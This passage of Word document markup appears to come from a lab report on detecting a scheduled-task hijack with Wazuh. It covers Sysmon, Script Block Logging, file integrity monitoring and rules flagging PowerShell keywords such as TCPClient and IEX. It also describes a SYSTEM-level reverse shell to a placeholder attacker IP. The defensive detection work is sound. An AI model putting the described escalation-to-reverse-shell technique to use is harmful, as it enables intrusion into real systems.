        <w:t>Prior to the execution of the attack, Wazuh was configured with specific rules and integration with Windows Sysmon and PowerShell Operational Logging to ensure full visibility into administrative abuses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E069F" w:rsidR="005E069F" w:rsidP="005E069F" w:rsidRDefault="005E069F" w14:paraId="63E3993C" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Privilege Escalation Monitoring (T1053):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> I configured Wazuh to monitor for MITRE Technique T1053.005, focusing on the creation or modification of Scheduled Tasks. This involved monitoring taskschd.msc events and registry changes to ensure any task pointing to a system-level script was audited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E069F" w:rsidR="005E069F" w:rsidP="005E069F" w:rsidRDefault="005E069F" w14:paraId="2D7A7ED8" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Rule Configuration (T1059.001):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> I enabled rules targeting the Execution phase of the attack. By monitoring for suspicious PowerShell keywords (like TCPClient and IEX), the system could flag when a scheduled task deviated from its normal "cleanup" behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E069F" w:rsidR="005E069F" w:rsidP="005E069F" w:rsidRDefault="005E069F" w14:paraId="4F60FB76" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Logging Policy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Script Block Logging (Event ID 4104) was enabled via Local Group Policy. This was crucial because it allowed the Wazuh manager to capture the plain-text content of the hijacked cleanup.ps1 script at the moment it was executed by the SYSTEM account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E069F" w:rsidP="005E069F" w:rsidRDefault="005E069F" w14:paraId="569BB349" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>File Integrity Monitoring (FIM):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Wazuh agent was specifically configured to monitor C:\TaskScripts\. This provided an early-warning signal the moment the script was overwritten, prior to the task actually running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E069F" w:rsidR="00533D16" w:rsidP="00533D16" w:rsidRDefault="00533D16" w14:paraId="32D6B309" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C572EA" w:rsidP="00533D16" w:rsidRDefault="00533D16" w14:paraId="0DB8CFA8" w14:textId="3211E363">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734D0921" wp14:editId="508CC281">
            <wp:extent cx="5836920" cy="1156970"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="138430"/>
            <wp:docPr id="1092200983" name="Picture 6" descr="A close-up of a computer screen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00983" name="Picture 6" descr="A close-up of a computer screen  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5836920" cy="11569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Pr="00C572EA" w:rsidR="00C572EA" w:rsidP="00C572EA" w:rsidRDefault="00C572EA" w14:paraId="3F6F0FA2" w14:textId="77777777"/>
    <w:p w:rsidRPr="00B27CAF" w:rsidR="00B27CAF" w:rsidP="00B27CAF" w:rsidRDefault="00B27CAF" w14:paraId="6DF448A3" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This incident was detected via Wazuh endpoint monitoring. The logs show three key indicators of the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00B27CAF" w:rsidR="00B27CAF" w:rsidP="00B27CAF" w:rsidRDefault="00B27CAF" w14:paraId="4F93895A" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious Script Execution: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Wazuh captured the full reverse shell payload (ScriptBlock ID: d21a34ef...). This confirmed the script was attempting a TCP connection to the attacker's IP (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00B27CAF" w:rsidR="00B27CAF" w:rsidP="00B27CAF" w:rsidRDefault="00B27CAF" w14:paraId="6A093083" w14:textId="6FF94D6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Abnormal Behavior (T1059.001):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system flagged high-risk PowerShell activity, specifically the use of Invoke-Expression to run code strings. These alerts were logged on Feb 1, 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00353AB6" w:rsidR="006F14CD" w:rsidRDefault="00FF5A9D" w14:paraId="1138AB60" w14:textId="2F2D9ED4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation (T1053.005): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Telemetry confirms the code was executed via a Scheduled Task running as SYSTEM, allowing the attacker to bypass standard user restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353AB6" w:rsidP="00353AB6" w:rsidRDefault="00353AB6" w14:paraId="68982DF6" w14:textId="77777777"/>
    <w:p w:rsidR="000C051C" w:rsidP="004F3A70" w:rsidRDefault="00BD0691" w14:paraId="2EF86DCA" w14:textId="4D5AC159">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658245" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3207767A" wp14:editId="59959AEF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1506855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1325033</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="515722048" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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3C7FFB84">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:118.65pt;margin-top:104.35pt;width:40pt;height:13.9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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6E679B8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UGPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhANCSLZjfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHgx dqEkQJClaYz1YnqwGs9bdgRSdhbZbcF/73Cyt5l5L2++V25m24sLjr5zpCBeRSCQamc6ahR8fuwe cxA+aDK6d4QKftHDprq9KXVh3ETveDmERnAI+UIraEMYCil93aLVfuUGJNa+3Wh14HVspBn1xOG2 l+soSqXVHfGHVg/43GJ9OpytgpfX+Ottztr8VO+an/12P5nsYVLq/m7ePoEIOId/Myz4jA4VMx3d mYwXvYJ1kiVs5SHKMxDsSOLlclykNAVZlfK6Q/UHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAVBj11U8CAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEA0JItmN8AAAALAQAADwAAAAAAAAAAAAAAAACpBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658244" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17F8A871" wp14:editId="481EAD58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>918422</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>141393</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="1980171053" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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5473F933">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:72.3pt;margin-top:11.15pt;width:40pt;height:13.9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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6B10C27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UGPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhAAmU90beAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJC6I pQtjm0rTaUKMC9qBgThnjWmqNU5psrW8Pd5pHH/70+/PxWr0rThhH5tAGqaTDARSFWxDtYbPj839 EkRMhqxpA6GGX4ywKq+vCpPbMNA7nnapFlxCMTcaXEpdLmWsHHoTJ6FD4t136L1JHPta2t4MXO5b qbJsLr1piC840+Gzw+qwO3oNL6/Tr7dx4ZaHalP/bNfbwS7uBq1vb8b1E4iEY7rAcNZndSjZaR+O ZKNoOc9mc0Y1KPUAggGlzoO9hsdMgSwL+f+D8g8AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA IQBUGPXVTwIAAPYEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI AAAAIQAJlPdG3gAAAAkBAAAPAAAAAAAAAAAAAAAAAKkEAABkcnMvZG93bnJldi54bWxQSwUGAAAA AAQABADzAAAAtAUAAAAA "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658243" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07E30510" wp14:editId="774D7168">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2319655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>124460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="1506268138" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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584FF9A6">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:182.65pt;margin-top:9.8pt;width:40pt;height:13.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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6D156EA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UGPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhAM7jfA7fAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISFwQ S8e2dpSm04QYl2kHBuKcNaap1jilydby7/FOcLP9np6/V6xG14oz9qHxpGA6SUAgVd40VCv4eN/c L0GEqMno1hMq+MEAq/L6qtC58QO94Xkfa8EhFHKtwMbY5VKGyqLTYeI7JNa+fO905LWvpen1wOGu lQ9JkkqnG+IPVnf4bLE67k9Owcvr9HM7ZnZ5rDb19269G0x2Nyh1ezOun0BEHOOfGS74jA4lMx38 iUwQrYJZupixlYXHFAQb5vPL4cBDtgBZFvJ/g/IXAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAVBj11U8CAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEAzuN8Dt8AAAAJAQAADwAAAAAAAAAAAAAAAACpBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658242" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C18D245" wp14:editId="1DA27D57">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>110067</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>120227</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="664633" cy="182033"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="1229997857" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="664633" cy="182033"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">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a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <w:pict w14:anchorId="6FEB771C">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:8.65pt;margin-top:9.45pt;width:52.35pt;height:14.35pt;z-index:25165824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70ad47 [3209]" strokeweight="1pt" w14:anchorId="24D07C3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aldUAIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1vGjEQvVfqf7B8L8sSSlPEEqFEqSqh BJVUOTteG1b1etyxYaG/vmPvsqQpp6oXM/bMm4/Hm53dHGrD9gp9Bbbg+WDImbISyspuCv796f7D NWc+CFsKA1YV/Kg8v5m/fzdr3FSNYAumVMgoifXTxhV8G4KbZpmXW1ULPwCnLDk1YC0CXXGTlSga yl6bbDQcTrIGsHQIUnlPr3etk89Tfq2VDI9aexWYKTj1FtKJ6XyJZzafiekGhdtWsmtD/EMXtags Fe1T3Ykg2A6rv1LVlUTwoMNAQp2B1pVUaQaaJh++mWa9FU6lWYgc73qa/P9LKx/2a7dCoqFxfurJ jFMcNNbxl/pjh0TWsSdLHQKT9DiZjCdXV5xJcuXXoyHZlCU7gx368EVBzaJRcKT/IlEk9ksf2tBT SKxl4b4yJr6fO0lWOBoVA4z9pjSrSqo9SomSSNStQbYX9PcKKZUNk66LFB1hmrL2wPwS0IS8A3Wx EaaSeHrg8BLwz4o9IlUFG3pwXVnASwnKH33lNv40fTtzHP8FyuMKGUIrXe/kfUV8LoUPK4GkVVI1 7V94pEMbaAoOncXZFvDXpfcYTxIiL2cNab/g/udOoOLMfLUkrs/5eByXJV3GHz+N6IKvPS+vPXZX 3wLxn9OmO5nMGB/MydQI9TOt6SJWJZewkmoXXAY8XW5Du5O06FItFimMFsSJsLRrJ2PyyGrUy9Ph WaDrRBVIjQ9w2hMxfaOtNjYiLSx2AXSVhHfmteOblitJt/sQxO19fU9R58/V/DcAAAD//wMAUEsD BBQABgAIAAAAIQCGr4W03gAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUhc UOs0oCaEOFWFKBfUA6Xi7MZLHDVeh9htwt+zPcFpNZrR7JtyNblOnHEIrScFi3kCAqn2pqVGwf5j M8tBhKjJ6M4TKvjBAKvq+qrUhfEjveN5FxvBJRQKrcDG2BdShtqi02HueyT2vvzgdGQ5NNIMeuRy 18k0SZbS6Zb4g9U9Plusj7uTU/Dyuvh8mzKbH+tN871db0eT3Y1K3d5M6ycQEaf4F4YLPqNDxUwH fyITRMc6u+ck3/wRxMVPU952UPCQLUFWpfw/oPoFAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAmvmpXVACAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEAhq+FtN4AAAAIAQAADwAAAAAAAAAAAAAAAACqBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3CAF32" wp14:editId="3F820C3A">
            <wp:extent cx="5836920" cy="2197735"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="126365"/>
            <wp:docPr id="574396359" name="Picture 4" descr="A screen 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96359" name="Picture 4" descr="A screen shot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5836920" cy="21977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8290C" w:rsidP="000C051C" w:rsidRDefault="00F8290C" w14:paraId="4FBD713B" w14:textId="77777777"/>
    <w:p w:rsidR="00F8290C" w:rsidP="000C051C" w:rsidRDefault="00F8290C" w14:paraId="70E5320D" w14:textId="77777777"/>
